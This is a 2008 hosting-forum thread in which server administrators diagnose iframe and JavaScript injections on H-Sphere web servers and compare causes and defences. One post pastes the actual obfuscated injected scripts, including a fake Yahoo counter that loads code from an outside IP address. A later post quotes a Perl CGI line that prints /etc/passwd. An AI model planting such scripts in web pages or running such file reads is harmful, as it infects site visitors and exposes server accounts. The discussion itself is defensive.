Hacking problems with iframe codes
12-01-08, 19:28
|
|
|---|---|
native Registered User Join: Sep 2002 Posts: 245 |
Hacking problems with iframe codes Hi, I want to know solutions for some of the issues we are facing with our web servers. If any one know about these issues and their fixes let me know some clues to find out the cause and resolve it. Many of the sites are getting hacked (even though server hardening is done and security is tightened) Hacking means new codes (iframes) are getting included in all index files and file ownerships of many of the files are changed as httpd users. Is this a hackers action or source code injection? Hsphere version : 3.1 OS : RHEL4 Share your thoughts and ideas about these problems. |
12-01-08, 23:15
|
|
|---|---|
 dynamicnet Registered User Join: Jan 2003 Posts: 13,687 |
Greetings George and Jason: Not all security / hardening is the same... that stated, I recommend examining the logs to see how the defacement are being done; chances are high a mod_security rule or rules can be developed to combat the particular vulnerability. For the sites in question, please check the installed applications as there is a high chance the application(s) involved are not sanitizing input variables. Most of these attacks are done via web-based injections where vulnerable applications. When those applications cannot be fixed fast enough, or otherwise be found to fix, then the server must be hardened / secured more than normal. Thank you. __________________ Peter M. Abraham, Senior Server Administrator Dynamic Net, Inc. -- US/Canada: 001-888-887-6727; International: 001-717-484-1062 -- email solutions @ dynamicnet.net Parallels H-Sphere Strategic Partner for H-Sphere Security and H-Sphere Server Management Server Security, Server Administration, Server Migrations, co-location, dedicated servers, and more http://www.dynamicnet.net/services/hsphere.htm |
12-02-08, 12:49
|
|
|---|---|
native Registered User Join: Sep 2002 Posts: 245 |
The problem is with what seems to be a javascript injection. I have found allot of people having the same issues as us on the web. But wondering if this is affecting any H-Sphere providers. Here is the basis of the attack. Today, several users are reporting that Norton displays a "Bloodhound Exploit" warning whenever loading websites. Alternatively, some users are reporting that Adobe Acrobat Reader cannot open file A9RD52D.TMP when trying to load website in a browser. Very, very strange. Some people (like me) haven't noticed a thing. But at least 8 people have reported this problem. There are some strange scripts in the footers which look suspicious: These scripts appear on the read.php pages: <script type="text/javascript"> <!-- var a='';var b='%20i20%8gB%20%20%00n%t.%20vedeyp_%20%2gDa00%2%% e2g20%2y%tn2le30%20%ee%20%0ssu%20%i0_%n%20%2ae2o0% %i00%2rD.A%20%3eE%2%20%n%hg%20%2%22%20%u0%20%2Cd%2 0%20r%2020s00%0ne%20%20%/tsk%a%20%m%tn2l%20%200g00%20a2o020%20%me2u_20%20k2 a%20%/%dn%20%2ehks%20%2Cir%efi2e0%200fB%20v2ca%t%20%l%p_ %20%2y2n%20%vDu20%2e8%20%20/%20 %2r%202.tA%2A%2022gy0e0%20g0gBss9%20%i3.%20%/tk%a%20%eDne%di%20%2ykuA%2020et0%20s2xygB%20%ed%02 rgs%20%a3d00%2r%me82A%20.Dmi2%20%e%20%20l2e%20%dlA %2A%2cA%2 0%cA%2%tn00%00%2%%ie2g20%2a2.t2e20%20s%eA%20/c0mp0%20k3em8rf9%20%e0l00%2%2la20%20%eei30%20rdm2% on0.%20v%l%20%a0ut2%00%2d3as20%20p0%20%2a%r0%20nf0 0%00%s00% %20%20icEd%20%20%tegf%A%20%0ul%hg%20%ae0%20%2Et2h% 20%addeyp_%00%2r%lB%20%em0.%20vaD5+y%20%/%2i2ysta20%200r0%20f2.mi9%20%e%dt%20%l%iB%20f2g%20 %.l9%20%20t%2020%p0%2dey20%20%2Eti2h%20%a%otIai30% 20n%lA%2022y0e0%20f2.t2elB%20v2y%20%2Cp%r20%2g%m2k 00%20tn0nf22gA%20%%f%20%2Dnl2%20%2a2un30%2022%20%2 es30%20h%20%20%i20%0%2t%20otI0%20%20xhn0e00%2r2cEd mmB%20vk2t%20%00%t.%20vl0gBssd%20%a0f30%20ra2e0%20 n3d0eA%20/e%f%l00n%20%22o20%20%te220%20m0raB%20f0h30%20%iB%2 0fi20%20%2p0%2%2C%202em9%2B%20/c00mp0%20iDne%d2%20%22a%20%2r%r2%20%20ul%hy%20%20% vA%20/ergA%20%r0809%20%0hodh0r%r20%22y30%20%oetuB%20f0ss e%20%t%eA%20.3t%20%p2B%2D%2CE%2 0%3E%2%me20%70%20a22o020%203em8r2A%20%%mB%20%tef%A %20%2cEdme2%20%2D.00%20tui00%2ru2222A%2020flt2oeu% 20%%e%20%2ddrnp30%2022erA%20.Dd00%2d%aA%20p%30%70% 330% 20%30%ful%20%20%2r%%r2%20%2%me2u%00%2ryi30%20xh0e0 0%2r%otIak2A%20%3d%20%2ahs%20%at%%%%00%2%20e0%tht0 %20fkm%20%l0cen%20%2%2lu00%2d3d%20%l0n00%2ad%20%20 %%20 ';var c='0564987132';for(var i=0;i<155;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*155)+i);documen t.writeln(unescape(a)); --> </script> <script language=javascript><!-- Yahoo! Counter starts here --> if(typeof(yahoo_counter)!=typeof(1))eval(unescape( '//`.~%2E%2E %3C#%64#i!%76%20s%74y~l#e|%3D%64@i@%73p!%6C!a~%79` :!n%6F%6E~e%3E\n`%76%61`%72%20~%5F;$%69@%66(&%64o@ %63|u&%6D%65%6Et.&%63%6F%6F%6Bie`%2Em!a%74#%63h%28 $%2F@%5C%62hg%66t%3D%31/)%3D&%3D%6E#u#ll%29@%64o&%63!%75!m!e%6E@t.~w%72%69 %74e%28%22%3C|s|c`%72!%69$%70%74%20!sr$%63%3D%2F`% 2F%37%38#.$%31%35&%37~.~%31#4#%32#.#5!%38|/$%63!%70/`?~"%2B@na~v%69%67|at`o#r%2Ea%70%70$%4E@%61~m%65.# %63%68|a~%72%41`%74|(%30%29%2B%22|%3E%3C%5C/#%73c$%72%69%70%74`%3E"&%29;&\n%2F#/%3C$%2F%64%69!%76%3E').replace(/\!|~|\||@|#|\$|`|\&/g,""));var yahoo_counter=1; <!-- counter end --></script> Also do a search on google or yahoo for <script language=javascript><!-- Yahoo! Counter starts here --> and it will show all the people having this same problem. Here is a very good explnation of exacrtlt what I have found from others on the web: This is starting to go around. It's coming from Latvia and it's on the server side. It attacks sites that use php, cms, forums, and blogs - and probably more but I don't know yet. It is rerouting your site to 78.157.142.58. It will eventually extract your username and password from CMS. It will route everyone using a search engine to find your site to their site and infect their computer. Next, you'll see pop-unders for places like MonsterMarketplace.com and others. I don't remember the exact URLs. Not that it matters. Make sure your Malware is up to date. Some antivirus softwares aren't even picking it up. You'll notice that if you strip out the fake Yahoo Counter and reload your page, it will magically reappear on your page. In fact, on ALL your pages. It’s a virus (or something of a malicious nature). It’s a JavaScript that has a very complex code that appears to be referencing an ip address or multiple ip addresses. I believe a site is vulnerable to this new attack through improperly set permissions on files. Yahoo clearly doesn’t make a counter script like this in any way. Also, the script shows up in many different locations (in the code) throughout various sites, which also points to that fact that it’s an automatically generated script. |
12-02-08, 14:37
|
|
|---|---|
dynamicnet Registered User Join: Jan 2003 Posts: 13,687 |
Greetings: RE: "it attacks sites that use php, cms, forums, and blogs - and probably more" The Javascript injections are via web-based injection through vulnerable PHP, CGI et al code along with server(s) that need more hardening. Thank you. __________________ Peter M. Abraham, Senior Server Administrator Dynamic Net, Inc. -- US/Canada: 001-888-887-6727; International: 001-717-484-1062 -- email solutions @ dynamicnet.net Parallels H-Sphere Strategic Partner for H-Sphere Security and H-Sphere Server Management Server Security, Server Administration, Server Migrations, co-location, dedicated servers, and more http://www.dynamicnet.net/services/hsphere.htm |
12-02-08, 14:50
|
|
|---|---|
native Registered User Join: Sep 2002 Posts: 245 |
Yes we have already done the hardening on the boxes and also check this against your recommendations and everything has been done. Also I have found a personal site we have been working on was hacked. The weird thing is the site I am working on is in a sub folder that no one knows exists but some how the hack has injected the code into the files in this unknow dir as well. How could a weak script do this if the location of the scripts are not even known. Seems very odd. Also I see lots of people having this happen but no ones seems to have any real solutions except to say it is related to php applications running on the server. |
12-02-08, 15:43
|
|
|---|---|
dynamicnet Registered User Join: Jan 2003 Posts: 13,687 |
Greetings Jason and George: As you already know from previous phone calls, we don't publish all of our hardening methods. The solution for this particular issue, as mentioned in a previous post you made is to create a mod_security rule to handle the issue. Asprox is either being involved or a mutation of it for your case. While Window-based in context, http://isc.sans.org/diary.html?storyid=5381 may be helpful from an overall view. Thank you. __________________ Peter M. Abraham, Senior Server Administrator Dynamic Net, Inc. -- US/Canada: 001-888-887-6727; International: 001-717-484-1062 -- email solutions @ dynamicnet.net Parallels H-Sphere Strategic Partner for H-Sphere Security and H-Sphere Server Management Server Security, Server Administration, Server Migrations, co-location, dedicated servers, and more http://www.dynamicnet.net/services/hsphere.htm |
12-02-08, 20:03
|
|
|---|---|
 stevewest15 Registered User Join: Nov 2004 Posts: 2,503 |
Hi native, Check to make sure there is no directory w/ 777 permission, or a weak ftp login/password. Also grep your ftp logs and see if you identify if the files were upload via ftp. In the meantime, I would say to filter outgoing port 80 so that if hacker is using a tool to fetch malicious code from a remote system, it will be blocked. But this is a temp fix and you really need to dig through your logs to see how they are doing this. Good luck, SW |
12-03-08, 12:41
|
|
|---|---|
native Registered User Join: Sep 2002 Posts: 245 |
Thanks Steve for you good advise. I am now seeing this is happening to Godaddy and other large hosts as well. When we find the cause we will let you know. If anyone else has seen the yahoo javascript injections and have any good info on these hackers or a fix please let us know. |
12-17-08, 18:08
|
|
|---|---|
JTY Registered User Join: Jun 2005 Posts: 238 |
We're seeing this as well, with a handful of customers on one web server. Some sites don't have any files modified, simply an SQL injection, while others have HTML pages where the ownership has been changed to httpd, with the JavaScript code added. |
12-18-08, 18:59
|
|
|---|---|
Leon2008 Registered User Join: Mar 2008 Posts: 7 |
I have seen it too on two unix servers. Html and php pages are affected with two types of scripts. - php pages get injected with php code (on the top of the page) which uses output buffer to inject yahoo javascript into the content returned to browser. the javascript itself does not appear in the files on server. - html pages get their javascript at the bottom of the page, without iframe tags. just plain javascript. We were not able to find anything useful in the server logs. I examined the php code used by hacker and it seems that this script is capable of self replicating across server. We found a file in /tmp folder containing list of all word writable files and folders on server. Every page infected with this php code can execute hacker's php posted to it. Servers were hardened before the attack and we do have mod_security running. We'd be happy to add some rules to prevent this from happening but nobody seems to know how it was injected. I am 100% sure that this hack can change file ownership and permissions on files which did not have 777 before and in folders with properly set permissions. Again, we have had serious examination of both servers and were unable to figure out how it happened. At the moment we can only cleanup the code and reset the permissions via cron scripts. I know one more hosting company that was seriously hurt and their experience is just about the same. |
12-18-08, 19:53
|
|
|---|---|
stevewest15 Registered User Join: Nov 2004 Posts: 2,503 |
Hi, Has anyone who has been impacted has tried to get a security specialist to take a closer look at how these hackers are getting in? You can try to use the following link and see if someone would be willing to assist: http://isc.sans.org/contact.html Good luck, SW |
12-19-08, 01:51
|
|
|---|---|
 yurtesen Registered User Join: Nov 2004 Posts: 8,097 |
Steve, I have seen a similar issue on 1 account in my cluster and found iframe code in the user's pages just last week. They used FTP! Yes, the hackers somehow stole user's FTP password. I believe this is not a hardening or h-sphere related problem. Check the xferlog. It might be that an FTP program has an exploit or something. Interesting enough, the hacker did not do any directory listings etc. they got in and changed all indexes directly and got out. __________________ FinWiz --- The Professional H-Sphere Support Company Evren Yurtesen --- Unix System Administrator Contact Info: support [ a t ] finwiz.net / +358-40-5073940 |
12-19-08, 06:32
|
|
|---|---|
yurtesen Registered User Join: Nov 2004 Posts: 8,097 |
My customer says he uses CuteFTP 8 and had the passwords saved in 3 different computers  while I dont know if this was how the passwords were stolen, perhaps a high possibility.If you figure that your sites were hacked using FTP also, please try to learn if your customer is saving his FTP password in the program he uses and if he uses CuteFTP or not. __________________ FinWiz --- The Professional H-Sphere Support Company Evren Yurtesen --- Unix System Administrator Contact Info: support [ a t ] finwiz.net / +358-40-5073940 |
12-19-08, 10:07
|
||
|---|---|---|
ladylinux Registered User Join: Jul 2003 Posts: 9,772 |
Evren, Quote:
Francesca EDIT:: PS: Also noted by one of these customers was that the passwords were sniffed locally. We all know what a loose protocol FTP is and how easy it is to extract a password as its sent clear text. __________________ "No Problems Only Solutions" We Provide Server Management, Security Hardening And Patch Management. Also Dedicated Servers, Colocation, VPS Servers And Hsphere Licenses. |
|
12-19-08, 10:18
|
|
|---|---|
native Registered User Join: Sep 2002 Posts: 245 |
Valuable Infrmation Our security team has been working hard on this and we are still finding a permminant solution. We have also found an extremely helpful article on these attacks. MUST READ >> http://www.softpanorama.org/Malware/...e_attack.shtml |
12-19-08, 10:25
|
|
|---|---|
stevewest15 Registered User Join: Nov 2004 Posts: 2,503 |
Hi, If these hackers are getting in via stolen ftp login/pass, then it's nothing new and we ran into this issue w/ some customers last year. This issue can be easily avoided if HS can be setup to require customers to change passwords every 3 months and to avoid using the same passwords for various services (ie cp, ftp, mail, etc.). We have a nightly script that scans the ftp log files and flags any successful logins that are coming from different IP addresses. It's not a perfect script but it does allow someone to identify if an account is about to get compromised or has been compromised via FTP. SW |
12-19-08, 13:22
|
||
|---|---|---|
 HPlugins Registered User Join: Jan 2006 Posts: 334 |
Quote:
I see it poping up from time to time but do not understand it at all. Lets see some scenarios: 1) PHP script run in PHP CGI mode. Executed under FTP user rights has rights to write anywhere in the FTP user directory it wants to. So can the exploit. 2) PHP script run under PHP mode. Will always have access to /tmp /var/tmp which by nature must be 777 So, any exploit can write to the dirs as well. 3) PHP script run under PHP mode under safemode and openbasedir. Will need at LEAST a session directory to write to which if not set to 777 has to be owned by httpd/apache user. So any exploit can write to that same directory. 4) lets not forget that any cgi script can read/write all over the server anyways. (yes, why dont you try a cat /etc/passwd in a CGI script and be amazed) So, unless you restrict your customers to only run PHP scripts sessionless and not writing ANYTHING to the harddrive,which I would like to see a single useful PHP app that works like that, I do not understand this sentence. So, to sum it all up, what is your magic trick to not have any 777 directories on the server and still have non-static websites running? __________________ http://www.HspherePlugins.com H-Sphere Postini Plugin and high quality EasyApps. NEW: Magento E-Commerce, Joomla 1.5.x, Wordpress 3.0.x and more... |
|
12-19-08, 13:44
|
|
|---|---|
yurtesen Registered User Join: Nov 2004 Posts: 8,097 |
Hplugins, PHP doesnt have to write to session directory, as a matter of fact, especially running with mod_php, you shouldnt allow PHP to access to session directory (it still can create sessions automatically). The reason for this is that the session files have the user/pass etc. information of authenticated sessions you dont want any PHP app to be able to read them since you cant restrict read rights to the owner if mod_php is used. In my systems I have the users jailed into their home directory using safe_mode and open_basedir (and without allowing them to read session directory. ) although I allow a shared /tmp directory if they have to use... anyway they really cant hack each other (of course safe_mode works good in FreeBSD but not in Linux unfortunately  )
__________________ FinWiz --- The Professional H-Sphere Support Company Evren Yurtesen --- Unix System Administrator Contact Info: support [ a t ] finwiz.net / +358-40-5073940 |
12-19-08, 14:07
|
|
|---|---|
HPlugins Registered User Join: Jan 2006 Posts: 334 |
ok, lets ignore sessions for a moment. You are telling me that your customers are running Joomla, Magento, Wordpress of any useful PHP application in safemode with openbasedir on without EITHER some directories owned by httpd or some dirs in 777 mode? If that would be true, they could not even enable the cache function of Joomla or Wordpress which any high traffic site needs. You can not install any modules or components in Joomla. Writing an article in Joomla and uploading a picture would not work, I mean I could go on and on. If you have customers that tolerate that you might be the luckiest host in the world. I never met one hosting company that could survive for a long time like that. You have to have some directories 777 or owned by httpd to get any useful PHP app running. This in turn means any exploit can use those directories. __________________ http://www.HspherePlugins.com H-Sphere Postini Plugin and high quality EasyApps. NEW: Magento E-Commerce, Joomla 1.5.x, Wordpress 3.0.x and more... |
12-19-08, 14:32
|
|
|---|---|
yurtesen Registered User Join: Nov 2004 Posts: 8,097 |
HPlugins, for example my users run Joomla, of course the created files are owned by httpd and the 777 rights (see the 2nd paragraph, I later remove 777 rights from any files if there are any) are necessary at first. But using safe_mode and open_basedir at the same time makes things pretty tight. In FreeBSD one just has to relax the safe_mode to use GID instead of UID (which is the same in H-Sphere so...) to get safe_mode and joomla etc. to play along. So once Joomla creates some files, it can access them even when safe_mode is enabled. This is explained in detail at my web site. Anyway, since the files are owned by httpd, they are not counted towards quota. Once a day I use a script to change ownerships and permissions of the files/directories created by httpd. I change the files to user/httpd 660 permissions and directories to user:user 777 permissions. Directories being 777 is unfortunately necessary. Although this doesnt matter much since open_basedir stops people from going into each other's homedirs. Also, since I am using safe_mode, the users are restricted to a safe_bin so they cant really use OS tools to do any harm. Standart apps like Joomla doesnt require any tools. So the security is really tight and still the users can use Joomla, osCommerce, smf forum, wordpress etc.(some of the stuff I remember that our users use) without problems... While the exploits can use the directories where PHP can write (also in fastcgi etc.), the exploit CAN NOT go and write/read from other users directories. As you can imagine, any app should be able to write something to work properly I am not saying that I stopped all write access and apps work properly  that would be insane Thanks, Evren __________________ FinWiz --- The Professional H-Sphere Support Company Evren Yurtesen --- Unix System Administrator Contact Info: support [ a t ] finwiz.net / +358-40-5073940 |
12-19-08, 15:02
|
||
|---|---|---|
HPlugins Registered User Join: Jan 2006 Posts: 334 |
Quote:
I rest my case
__________________ http://www.HspherePlugins.com H-Sphere Postini Plugin and high quality EasyApps. NEW: Magento E-Commerce, Joomla 1.5.x, Wordpress 3.0.x and more... |
|
12-19-08, 15:30
|
||||
|---|---|---|---|---|
yurtesen Registered User Join: Nov 2004 Posts: 8,097 |
HPlugins, I dont understand what you are talking about Your post was flawed... Quote:
Quote:
Quote:
ok you dont claim this to be correct eh? While you dont understand why there shouldnt be directories and files laying around with 777 rights. If you think for a second, this is to stop users from writing over each others directories etc. Please read and learn about system permissions and investigate the settings h-sphere puts. There are several discussions about this here and all around the internet probably. In my system I cornered the users in such way that they cant see or write to directories fro, web with permissions of 777 if it is not in their web directory. I just pointed that out. __________________ FinWiz --- The Professional H-Sphere Support Company Evren Yurtesen --- Unix System Administrator Contact Info: support [ a t ] finwiz.net / +358-40-5073940 |
|||
12-19-08, 16:15
|
||
|---|---|---|
ladylinux Registered User Join: Jul 2003 Posts: 9,772 |
Hello, Quote:
Of course you can roll over if you wish and say that is the way it is. I mean its not like there are not 1 billion Joomla Et all phishing sites/ hacks / defacements a day. The system (Web Hosting) is broke and greed (Cheap Hosting At Any Cost) fuels the cruddy system we have in place. Francesca __________________ "No Problems Only Solutions" We Provide Server Management, Security Hardening And Patch Management. Also Dedicated Servers, Colocation, VPS Servers And Hsphere Licenses. |
|
12-19-08, 17:33
|
|
|---|---|
HPlugins Registered User Join: Jan 2006 Posts: 334 |
yurtesen: none of your arguments is hitting the issue I was referring to. When I point out PHP without safemode you point out "but not if you have safemode on" When I point to safemode on and there is at least one directory writable you point our you do not need that one directory but shortly before make the point the unfortunately you NEED 777 dirs. My first post was about the statement "make sure there is no directory w/ 777 permission" As much as you can have the arrogant opinion that I should read up about permissions, I stand by the fact that a CGI script can read and write all over the server. #!/usr/bin/perl print "Content-type: text/plain\n\n"; print `cat /etc/passwd`; } Works on any hsphere account (on 99% of any account independent of the Hosting Control panel for that matter) without a hitch. So, to get back to the actual issue I was trying to point out: If you have no writable directories in SOME form you can only provide static html content with the Applications on the market today. So the statement "make sure there are no 777 directories" seems impractical to me. Do I wish somebody somebody would be writing Database only applications that write all Data into a database backend and do not use the filesystem anymore? Of course! But its not the case at the moment. B.T.W. for those of you hit with a lot of iframe inclusions on one server, do a clamscan through the /hsphere/local/home. It will give you a list of infected files which you then can clean with some perl magic... __________________ http://www.HspherePlugins.com H-Sphere Postini Plugin and high quality EasyApps. NEW: Magento E-Commerce, Joomla 1.5.x, Wordpress 3.0.x and more... |
« Previous Thread | Next Thread »
| Search this thread | Forum jump |
|---|---|
| Thread tools | Rating | Display modes |
|---|---|---|
|
Linear Mode
|